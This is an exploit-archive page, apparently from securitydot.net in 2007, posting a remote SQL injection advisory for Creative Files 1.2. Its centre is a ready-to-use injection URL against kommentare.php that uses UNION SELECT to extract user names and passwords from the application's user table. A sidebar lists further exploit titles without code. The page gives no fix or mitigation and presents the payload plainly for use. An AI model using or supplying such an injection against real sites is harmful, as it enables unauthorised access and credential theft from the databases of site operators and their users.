exploits , vulnerabilities , articles , Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerability

2007-03-15 Creative Guestbook 1.0 Multiple Remote Vulnerabilities

2007-03-16

Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerability

Rated as : Moderate Risk

======================X=O=R=O=N=====================
+
+ Creative Files 1.2 (kommentare.php)  Remote SQL Injection
Vulnerabilities
+
======================X=O=R=O=N=====================
+
+ Bulan: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+
kommentare.php?dlid=-1/**/UNION/**/SELECT/**/null,null,null,name,null,PASSWORD,null/**/FROM/**/user/*
+
======================X=O=R=O=N=====================
+
+ Vendor site: http://www.thecreativeheads.de/CreativeFiles/downloads.php
+
======================X=O=R=O=N=====================
+
+ Thnx: pang0, unique
+
======================X=O=R=O=N=====================
securitydot.net - 2007-03-16

Exploits - newest 10 RSS | More

2007-06-15 57272 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34204 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42427 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29330 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19770 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16707 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19406 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16594 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33607 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17232 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit